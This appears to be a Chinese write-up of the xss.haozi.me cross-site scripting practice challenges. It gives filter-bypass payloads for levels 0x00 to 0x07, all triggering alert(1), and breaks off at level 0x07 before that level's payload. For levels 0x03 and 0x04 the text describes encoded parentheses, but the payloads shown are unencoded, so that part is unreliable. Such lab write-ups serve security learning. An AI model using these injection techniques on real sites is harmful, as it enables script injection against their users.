url:https://xss.haozi.me/
文章目录
- 0x00
- 0x01
- 0x02
- 0x03
- 0x04
- 0x05
- 0x06
- 0x07
- 0x08
- 0x09
- 0x0A
- 0x0B
- 0x0C
- 00xD
- 00xE
- 00xF
- 0x10
- 0x11
- 0x12
0x00
先看js代码,第一关给你热热手,没给你加过
payload:
<script>alert(1)</script>
0x01
这关给你限制了把你输入的js代码变成文本格式执行不了,我们把前后两个标签闭合了就能绕过
payload:
</textarea><script>alert(1)</script><textarea>
0x02
从js代码来看,逃逸掉vaule属性就可以,这里随便用个触发事件都可以
payload:
1"><script>alert(1)</script>
0x03
这关就已经开始用正则表达式来过滤一些符号了,这关过滤掉了(),过滤掉了()也就代表着不能用alert(1)来触发了,但是我们可以试着用html编码把()编码尝试,发现寄不行,因为js不会解码。
我们这时候可以用a标签来进行编码绕过,为什么a标签可以?因为a标签中的href解码顺序为 html,url,JavaScript。所以我们在a标签中编码,html编码已经被解码成功了,成功生成了()。同理使用url编解码也可以成功生成()
payload:
<a href="javascript:alert(1)">0x03</a>
0x04
同第三关,只是多过滤了一个反引号`
payload:
<a href="javascript:alert(1)">0x04</a>
0x05
挺离谱的,给你把–>换成笑脸的表情,这可能是作者的小趣味(0v0),把–>过滤意思就是说不想让你用注释来扰,但是同样我们可以直接逃逸掉这个
payload:
**--!><img src=x onerror=alert(1)
0x06
这关正则的意思是,不让你用auto或者on开头,而且是以=结尾的字符串。我们直接换行可以绕过
payload:
onmouseover
=
alert(1)
0x07
本关对</>进行了过滤,不让我们闭合
payload:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1851980.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!